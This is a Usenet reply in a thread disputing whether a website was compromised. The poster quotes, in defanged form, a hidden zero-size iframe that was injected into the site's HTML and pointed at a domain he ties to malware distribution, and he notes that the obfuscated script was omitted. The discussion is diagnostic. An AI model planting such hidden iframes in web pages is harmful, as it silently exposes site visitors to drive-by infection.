From: "Tim Smith" <reply_in_group@mouse-potato.com>

| In article <642dveF2a7vd5U1@mid.dfncis.de>,
| "Sebastian G." <seppi@seppig.de> wrote:
>>> You can sit here and twist all you like, but YOUR SITE WAS COMPROMISED AND
>>> USED TO INFECT OTHERS.
>>
>> There's no indication that his website was compromised. Stating it in big
>> letters doesn't make any less false.
|
| You don't consider someone other than yourself editing the pages on your
| website to be being compromised?
|

The following was appended to the HTML of the web site...
{ obfuscated code }

<i frame src="hxxp://pinoc.com/count.php?o=2" width=0 height=0 style="hidden" frameborder=0
marginheight=0 marginwidth=0 scrolling=no></i frame>

As Ant noted, pinoc.com is a suspended site associated with ESTDomains.

There is a well established link between ESTDomains and malicious web sites that are
designed to do nothing more then infect the unsuspecting visitor.

The site was hacked and thus compramised.

The ONLY question that should be now asked is...
What was the exploitation vector that used to compramise the web site.

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp